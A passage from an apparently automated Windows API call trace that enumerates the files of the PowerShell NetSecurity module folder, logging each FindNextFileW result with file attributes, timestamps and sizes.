lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2077, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallProfile.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.128] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7a32, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallRule.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.128] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x15b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallSecurityFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.129] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallServiceFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.129] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x18ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallSetting.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.129] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x75d, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetGPO.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.129] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f27, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecDospSetting.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.129] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x53e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecIdentity.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.129] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x32ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.129] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4162, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecMainModeRule.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.129] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x825, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecMainModeSA.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.130] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2d50, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecPhase1AuthSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.130] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2b0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecPhase2AuthSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.170] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecPolicyChange.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.171] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e77, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.171] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecQuickModeSA.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.171] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x994b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecRule.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.171] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20fee, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.formats.ps1xml", cAlternateFileName="")) returned 1 [0265.171] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.psd1", cAlternateFileName="")) returned 1 [0265.172] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12106, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.types.ps1xml", cAlternateFileName="")) returned 1 [0265.172] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.172] FindClose (in: hFindFile=0x1a8db140 | out: hFindFile=0x1a8db140) returned 1 [0265.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.172] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity", lpFilePart=0x0) returned 0x3e [0265.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0265.172] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netsecurity"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0265.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0265.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0265.173] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity", lpFilePart=0x0) returned 0x3e [0265.173] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\", lpFilePart=0x0) returned 0x3f [0265.173] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.173] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.173] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0265.173] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.Firewall.Commands.dll", cAlternateFileName="")) returned 1 [0265.174] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf01, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallAddressFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.174] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xca0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallApplicationFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.174] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xbe5, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallInterfaceFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.174] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.174] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1300, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallPortFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.174] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2077, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallProfile.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.175] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7a32, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallRule.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.175] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x15b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallSecurityFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.175] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallServiceFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.175] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x18ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallSetting.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.175] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x75d, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetGPO.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.176] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f27, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecDospSetting.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.176] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x53e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecIdentity.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.176] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x32ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.176] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4162, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecMainModeRule.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.176] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x825, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecMainModeSA.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.176] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2d50, dwReserved0=0x0, dwReserved1=0x0, 